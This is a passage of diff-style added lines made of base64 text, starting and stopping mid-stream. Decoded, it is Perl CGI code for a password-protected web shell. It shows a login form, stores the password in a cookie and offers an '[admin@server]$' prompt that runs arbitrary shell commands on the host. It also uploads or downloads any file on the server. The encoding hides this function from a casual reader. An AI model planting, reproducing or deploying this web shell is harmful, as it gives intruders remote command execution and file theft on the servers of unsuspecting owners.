+CgkmUHJpbnRQYWdlSGVhZGVyKCJwIik7DQoJJlByaW50TG9nb3V0U2NyZWVuOw0KDQoJJlByaW50
+TG9naW5TY3JlZW47DQoJJlByaW50TG9naW5Gb3JtOw0KCSZQcmludFBhZ2VGb290ZXI7DQp9DQoN
+CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gbG9n
+aW4gdGhlIHVzZXIuIElmIHRoZSBwYXNzd29yZCBtYXRjaGVzLCBpdA0KIyBkaXNwbGF5cyBhIHBh
+Z2UgdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gcnVuIGNvbW1hbmRzLiBJZiB0aGUgcGFzc3dvcmQg
+ZG9lbnMndA0KIyBtYXRjaCBvciBpZiBubyBwYXNzd29yZCBpcyBlbnRlcmVkLCBpdCBkaXNwbGF5
+cyBhIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXINCiMgdG8gbG9naW4NCiMtLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0NCnN1YiBQZXJmb3JtTG9naW4gDQp7DQoJaWYoJExvZ2luUGFzc3dvcmQgZXEgJFBh
+c3N3b3JkKSAjIHBhc3N3b3JkIG1hdGNoZWQNCgl7DQoJCXByaW50ICJTZXQtQ29va2llOiBTQVZF
+RFBXRD0kTG9naW5QYXNzd29yZDtcbiI7DQoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCgkJJlBy
+aW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJfQ0KCWVsc2Ug
+IyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoInAiKTsNCgkJ
+JlByaW50TG9naW5TY3JlZW47DQoJCWlmKCRMb2dpblBhc3N3b3JkIG5lICIiKSAjIHNvbWUgcGFz
+c3dvcmQgd2FzIGVudGVyZWQNCgkJew0KCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOw0KDQoJ
+CX0NCgkJJlByaW50TG9naW5Gb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCn0NCg0KIy0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0
+aGUgdXNlciB0byBlbnRlciBjb21tYW5kcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFBy
+aW50Q29tbWFuZExpbmVJbnB1dEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50
+RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8
+PEVORDsNCjxjb2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3Jp
+cHRMb2NhdGlvbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFu
+ZCI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0K
+JFByb21wdA0KPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPg0KPGlucHV0IHR5cGU9InN1Ym1p
+dCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCg0KRU5EDQp9DQoNCiMtLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVz
+ZXIgdG8gZG93bmxvYWQgZmlsZXMNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludEZp
+bGVEb3dubG9hZEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDog
+IlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8PEVORDsNCjxj
+b2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlv
+biI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0K
+PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImRvd25sb2FkIj4NCiRQcm9tcHQg
+ZG93bmxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBz
+aXplPSIzNSI+PGJyPjxicj4NCkRvd25sb2FkOiA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0i
+QmVnaW4iPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gdXBsb2Fk
+IGZpbGVzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRGaWxlVXBsb2FkRm9ybQ0K
+ew0KCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVy
+TmFtZSAkQ3VycmVudERpcl1cJCAiOw0KCXByaW50IDw8RU5EOw0KPGNvZGU+DQoNCjxmb3JtIG5h
+bWU9ImYiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG1ldGhvZD0iUE9TVCIgYWN0aW9u
+PSIkU2NyaXB0TG9jYXRpb24iPg0KJFByb21wdCB1cGxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxp
+bnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4NCk9wdGlvbnM6ICZu
+YnNwOzxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ibyIgdmFsdWU9Im92ZXJ3cml0ZSI+DQpP
+dmVyd3JpdGUgaWYgaXQgRXhpc3RzPGJyPjxicj4NClVwbG9hZDombmJzcDsmbmJzcDsmbmJzcDs8
+aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIg
+bmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9
+ImEiIHZhbHVlPSJ1cGxvYWQiPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdGltZW91
+dCBmb3IgYSBjb21tYW5kIGV4cGlyZXMuIFdlIG5lZWQgdG8NCiMgdGVybWluYXRlIHRoZSBzY3Jp
+cHQgaW1tZWRpYXRlbHkuIFRoaXMgZnVuY3Rpb24gaXMgdmFsaWQgb25seSBvbiBVbml4LiBJdCBp
+cw0KIyBuZXZlciBjYWxsZWQgd2hlbiB0aGUgc2NyaXB0IGlzIHJ1bm5pbmcgb24gTlQuDQojLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgQ29tbWFuZFRpbWVvdXQNCnsNCglpZighJFdpbk5UKQ0K
+CXsNCgkJYWxhcm0oMCk7DQoJCXByaW50IDw8RU5EOw0KPC94bXA+DQoNCjxjb2RlPg0KQ29tbWFu
+ZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25k
+KHMpLg0KPGJyPktpbGxlZCBpdCENCkVORA0KCQkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsN
+CgkJJlByaW50UGFnZUZvb3RlcjsNCgkJZXhpdDsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gZXhlY3V0ZSBjb21tYW5kcy4gSXQg
+ZGlzcGxheXMgdGhlIG91dHB1dCBvZiB0aGUNCiMgY29tbWFuZCBhbmQgYWxsb3dzIHRoZSB1c2Vy
+IHRvIGVudGVyIGFub3RoZXIgY29tbWFuZC4gVGhlIGNoYW5nZSBkaXJlY3RvcnkNCiMgY29tbWFu
+ZCBpcyBoYW5kbGVkIGRpZmZlcmVudGx5LiBJbiB0aGlzIGNhc2UsIHRoZSBuZXcgZGlyZWN0b3J5
+IGlzIHN0b3JlZCBpbg0KIyBhbiBpbnRlcm5hbCB2YXJpYWJsZSBhbmQgaXMgdXNlZCBlYWNoIHRp
+bWUgYSBjb21tYW5kIGhhcyB0byBiZSBleGVjdXRlZC4gVGhlDQojIG91dHB1dCBvZiB0aGUgY2hh
+bmdlIGRpcmVjdG9yeSBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQgdG8gdGhlIHVzZXJzDQojIHRo
+ZXJlZm9yZSBlcnJvciBtZXNzYWdlcyBjYW5ub3QgYmUgZGlzcGxheWVkLg0KIy0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLQ0Kc3ViIEV4ZWN1dGVDb21tYW5kDQp7DQoJaWYoJFJ1bkNvbW1hbmQgPX4gbS9e
+XHMqY2RccysoLispLykgIyBpdCBpcyBhIGNoYW5nZSBkaXIgY29tbWFuZA0KCXsNCgkJIyB3ZSBj
+aGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQ0KCQkjIGNv
+bW1hbmQgaXMgbm90IGRpc3BsYXllZC4NCgkJDQoJCSRPbGREaXIgPSAkQ3VycmVudERpcjsNCgkJ
+JENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAkMSIuJENtZFNlcC4k
+Q21kUHdkOw0KCQljaG9wKCRDdXJyZW50RGlyID0gYCRDb21tYW5kYCk7DQoJCSZQcmludFBhZ2VI
+ZWFkZXIoImMiKTsNCgkJJFByb21wdCA9ICRXaW5OVCA/ICIkT2xkRGlyPiAiIDogIlthZG1pblxA
+JFNlcnZlck5hbWUgJE9sZERpcl1cJCAiOw0KCQlwcmludCAiJFByb21wdCAkUnVuQ29tbWFuZCI7
+DQoJfQ0KCWVsc2UgIyBzb21lIG90aGVyIGNvbW1hbmQsIGRpc3BsYXkgdGhlIG91dHB1dA0KCXsN
+CgkJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50
+RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCgkJcHJpbnQg
+IiRQcm9tcHQgJFJ1bkNvbW1hbmQ8eG1wPiI7DQoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnRE
+aXJcIiIuJENtZFNlcC4kUnVuQ29tbWFuZC4kUmVkaXJlY3RvcjsNCgkJaWYoISRXaW5OVCkNCgkJ
+ew0KCQkJJFNJR3snQUxSTSd9ID0gXCZDb21tYW5kVGltZW91dDsNCgkJCWFsYXJtKCRDb21tYW5k
+VGltZW91dER1cmF0aW9uKTsNCgkJfQ0KCQlpZigkU2hvd0R5bmFtaWNPdXRwdXQpICMgc2hvdyBv
+dXRwdXQgYXMgaXQgaXMgZ2VuZXJhdGVkDQoJCXsNCgkJCSR8PTE7DQoJCQkkQ29tbWFuZCAuPSAi
+IHwiOw0KCQkJb3BlbihDb21tYW5kT3V0cHV0LCAkQ29tbWFuZCk7DQoJCQl3aGlsZSg8Q29tbWFu
+ZE91dHB1dD4pDQoJCQl7DQoJCQkJJF8gPX4gcy8oXG58XHJcbikkLy87DQoJCQkJcHJpbnQgIiRf
+XG4iOw0KCQkJfQ0KCQkJJHw9MDsNCgkJfQ0KCQllbHNlICMgc2hvdyBvdXRwdXQgYWZ0ZXIgY29t
+bWFuZCBjb21wbGV0ZXMNCgkJew0KCQkJcHJpbnQgYCRDb21tYW5kYDsNCgkJfQ0KCQlpZighJFdp
+bk5UKQ0KCQl7DQoJCQlhbGFybSgwKTsNCgkJfQ0KCQlwcmludCAiPC94bXA+IjsNCgl9DQoJJlBy
+aW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQg
+Y29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcg0KIyB0byBkb3dubG9hZCB0aGUg
+c3BlY2lmaWVkIGZpbGUuIFRoZSBwYWdlIGFsc28gY29udGFpbnMgYSBhdXRvLXJlZnJlc2gNCiMg
+ZmVhdHVyZSB0aGF0IHN0YXJ0cyB0aGUgZG93bmxvYWQgYXV0b21hdGljYWxseS4NCiMgQXJndW1l
+bnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2Fk
+ZWQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludERvd25sb2FkTGlua1BhZ2UNCnsN
+Cglsb2NhbCgkRmlsZVVybCkgPSBAXzsNCglpZigtZSAkRmlsZVVybCkgIyBpZiB0aGUgZmlsZSBl
+eGlzdHMNCgl7DQoJCSMgZW5jb2RlIHRoZSBmaWxlIGxpbmsgc28gd2UgY2FuIHNlbmQgaXQgdG8g
+dGhlIGJyb3dzZXINCgkJJEZpbGVVcmwgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJI
+KiIsJDEpL2VnOw0KCQkkRG93bmxvYWRMaW5rID0gIiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2Fk
+JmY9JEZpbGVVcmwmbz1nbyI7DQoJCSRIdG1sTWV0YUhlYWRlciA9ICI8bWV0YSBIVFRQLUVRVUlW
+PVwiUmVmcmVzaFwiIENPTlRFTlQ9XCIxOyBVUkw9JERvd25sb2FkTGlua1wiPiI7DQoJCSZQcmlu
+dFBhZ2VIZWFkZXIoImMiKTsNCgkJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCg0KU2VuZGluZyBGaWxl
+ICRUcmFuc2ZlckZpbGUuLi48YnI+DQpJZiB0aGUgZG93bmxvYWQgZG9lcyBub3Qgc3RhcnQgYXV0
+b21hdGljYWxseSwNCjxhIGhyZWY9IiREb3dubG9hZExpbmsiPkNsaWNrIEhlcmU8L2E+Lg0KRU5E
+DQoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0N
+CgllbHNlICMgZmlsZSBkb2Vzbid0IGV4aXN0DQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7
+DQoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJEZpbGVVcmw6ICQhIjsNCgkJJlByaW50Rmls
+ZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQp9DQoNCiMtLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJv
+bSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlDQojIGJyb3dzZXIsIHNvIHRoYXQgaXQgY2Fu
+IGJlIGRvd25sb2FkZWQgYnkgdGhlIHVzZXIuDQojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmll
+ZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBzZW50Lg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LQ0Kc3ViIFNlbmRGaWxlVG9Ccm93c2VyDQp7DQoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOw0KCWlm
+KG9wZW4oU0VOREZJTEUsICRTZW5kRmlsZSkpICMgZmlsZSBvcGVuZWQgZm9yIHJlYWRpbmcNCgl7
+DQoJCWlmKCRXaW5OVCkNCgkJew0KCQkJYmlubW9kZShTRU5ERklMRSk7DQoJCQliaW5tb2RlKFNU
+RE9VVCk7DQoJCX0NCgkJJEZpbGVTaXplID0gKHN0YXQoJFNlbmRGaWxlKSlbN107DQoJCSgkRmls
+ZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsNCgkJcHJpbnQgIkNvbnRlbnQt
+VHlwZTogYXBwbGljYXRpb24veC11bmtub3duXG4iOw0KCQlwcmludCAiQ29udGVudC1MZW5ndGg6
+ICRGaWxlU2l6ZVxuIjsNCgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7
+IGZpbGVuYW1lPSQxXG5cbiI7DQoJCXByaW50IHdoaWxlKDxTRU5ERklMRT4pOw0KCQljbG9zZShT
+RU5ERklMRSk7DQoJfQ0KCWVsc2UgIyBmYWlsZWQgdG8gb3BlbiBmaWxlDQoJew0KCQkmUHJpbnRQ
+YWdlSGVhZGVyKCJmIik7DQoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJFNlbmRGaWxlOiAk
+ISI7DQoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07DQoNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9
+DQp9DQoNCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxl
+ZCB3aGVuIHRoZSB1c2VyIGRvd25sb2FkcyBhIGZpbGUuIEl0IGRpc3BsYXlzIGEgbWVzc2FnZQ0K
+IyB0byB0aGUgdXNlciBhbmQgcHJvdmlkZXMgYSBsaW5rIHRocm91Z2ggd2hpY2ggdGhlIGZpbGUg
+Y2FuIGJlIGRvd25sb2FkZWQuDQojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0
+aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsDQojIHRoZSBmaWxlIGlz
+IHJlYWQgYW5kIHNlbnQgdG8gdGhlIGJyb3dzZXIuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpz
+dWIgQmVnaW5Eb3dubG9hZA0Kew0KCSMgZ2V0IGZ1bGx5IHF1YWxpZmllZCBwYXRoIG9mIHRoZSBm
+aWxlIHRvIGJlIGRvd25sb2FkZWQNCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9e
+XFx8Xi46LykpIHwNCgkJKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBw
+YXRoIGlzIGFic29sdXRlDQoJew0KCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7DQoJfQ0K
+CWVsc2UgIyBwYXRoIGlzIHJlbGF0aXZlDQoJew0KCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFy
+Z2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOw0KCQkkVGFyZ2V0RmlsZSAuPSAk
+UGF0aFNlcC4kVHJhbnNmZXJGaWxlOw0KCX0NCg0KCWlmKCRPcHRpb25zIGVxICJnbyIpICMgd2Ug
+aGF2ZSB0byBzZW5kIHRoZSBmaWxlDQoJew0KCQkmU2VuZEZpbGVUb0Jyb3dzZXIoJFRhcmdldEZp
+bGUpOw0KCX0NCgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQ0KCXsN
+CgkJJlByaW50RG93bmxvYWRMaW5rUGFnZSgkVGFyZ2V0RmlsZSk7DQoJfQ0KfQ0KDQojLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIg
+d2FudHMgdG8gdXBsb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGUgaXMgbm90IHNwZWNpZmllZCwg
+aXQgZGlzcGxheXMgYSBmb3JtIGFsbG93aW5nIHRoZSB1c2VyIHRvIHNwZWNpZnkgYQ0KIyBmaWxl
+LCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4NCiMtLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0NCnN1YiBVcGxvYWRGaWxlDQp7DQoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwg
+cHJpbnQgdGhlIHVwbG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5zZmVyRmlsZSBlcSAiIikNCgl7
+DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50RmlsZVVwbG9hZEZvcm07DQoJCSZQ
+cmludFBhZ2VGb290ZXI7DQoJCXJldHVybjsNCgl9DQoJJlByaW50UGFnZUhlYWRlcigiYyIpOw0K
+DQoJIyBzdGFydCB0aGUgdXBsb2FkaW5nIHByb2Nlc3MNCglwcmludCAiVXBsb2FkaW5nICRUcmFu
+c2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsNCg0KCSMgZ2V0IHRoZSBmdWxsbHkgcXVh
+bGlmaWVkIHBhdGhuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGNyZWF0ZWQNCgljaG9wKCRUYXJnZXRO
+YW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsNCgkkVHJh
+bnNmZXJGaWxlID1+IG0hKFteL15cXF0qKSQhOw0KCSRUYXJnZXROYW1lIC49ICRQYXRoU2VwLiQx
+Ow0KDQoJJFRhcmdldEZpbGVTaXplID0gbGVuZ3RoKCRpbnsnZmlsZWRhdGEnfSk7DQoJIyBpZiB0
+aGUgZmlsZSBleGlzdHMgYW5kIHdlIGFyZSBub3Qgc3VwcG9zZWQgdG8gb3ZlcndyaXRlIGl0DQoJ
+aWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpDQoJew0KCQlwcmlu
+dCAiRmFpbGVkOiBEZXN0aW5hdGlvbiBmaWxlIGFscmVhZHkgZXhpc3RzLjxicj4iOw0KCX0NCgll
+bHNlICMgZmlsZSBpcyBub3QgcHJlc2VudA0KCXsNCgkJaWYob3BlbihVUExPQURGSUxFLCAiPiRU
+YXJnZXROYW1lIikpDQoJCXsNCgkJCWJpbm1vZGUoVVBMT0FERklMRSkgaWYgJFdpbk5UOw0KCQkJ
+cHJpbnQgVVBMT0FERklMRSAkaW57J2ZpbGVkYXRhJ307DQoJCQljbG9zZShVUExPQURGSUxFKTsN
+CgkJCXByaW50ICJUcmFuc2ZlcmVkICRUYXJnZXRGaWxlU2l6ZSBCeXRlcy48YnI+IjsNCgkJCXBy
+aW50ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7DQoJCX0NCgkJZWxzZQ0KCQl7DQoJCQlw
+cmludCAiRmFpbGVkOiAkITxicj4iOw0KCQl9DQoJfQ0KCXByaW50ICIiOw0KCSZQcmludENvbW1h
+bmRMaW5lSW5wdXRGb3JtOw0KDQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRz
+IHRvIGRvd25sb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGVuYW1lIGlzIG5vdCBzcGVjaWZpZWQs
+IGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGENCiMgZmls
+ZSwgb3RoZXJ3aXNlIGl0IGRpc3BsYXlzIGEgbWVzc2FnZSB0byB0aGUgdXNlciBhbmQgcHJvdmlk
+ZXMgYSBsaW5rDQojIHRocm91Z2ggIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLg0K
+Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIERvd25sb2FkRmlsZQ0Kew0KCSMgaWYgbm8gZmls
+ZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSBkb3dubG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5z
+ZmVyRmlsZSBlcSAiIikNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50Rmls
+ZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgkJcmV0dXJuOw0KCX0NCgkNCgkj
+IGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkDQoJ
+aWYoKCRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlxcfF4uOi8pKSB8DQoJCSghJFdpbk5U
+ICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXC8vKSkpICMgcGF0aCBpcyBhYnNvbHV0ZQ0KCXsNCgkJ
+JFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOw0KCX0NCgllbHNlICMgcGF0aCBpcyByZWxhdGl2
+ZQ0KCXsNCgkJY2hvcCgkVGFyZ2V0RmlsZSkgaWYoJFRhcmdldEZpbGUgPSAkQ3VycmVudERpcikg
+PX4gbS9bXFxcL10kLzsNCgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsN
+Cgl9DQoNCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQ0K
